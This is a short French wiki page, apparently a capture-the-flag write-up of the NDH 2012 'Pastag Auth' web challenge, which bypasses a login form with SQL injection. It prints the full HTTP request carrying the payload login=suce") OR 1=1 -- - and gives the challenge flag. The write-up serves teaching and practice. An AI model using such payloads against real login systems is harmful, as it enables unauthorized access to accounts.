Outils d'utilisateurs

Outils du Site


ndh2k12_public:web:pastag_auth

Table des matières

Pastag Auth

Overview

On trouve une page d'authentification classique, rien de bien méchant.

Exploitation

La première chose qui passe par la tête c'est une Injection SQL blind qui permettrait de se connecter sans mot de passe. C'est évidemment la bonne solution. On a juste galéré à comprendre qu'il fallait en fait fermer une parenthèse pour exploiter correctement la faille.

POST /action.php HTTP/1.1
Host: 54.247.160.116:8008
User-Agent: Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=vhks5uigf3faen5m106125r1j1
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
login=suce") OR 1=1 -- -&mdp=suce&token=851300ee84c2b80ed40f51ed26d866fc&cnx=Connexion

Flag : df2f49e1360980b107c376fd2fe245e8

ndh2k12_public/web/pastag_auth.txt · Dernière modification: 2017/04/09 15:33 (modification externe)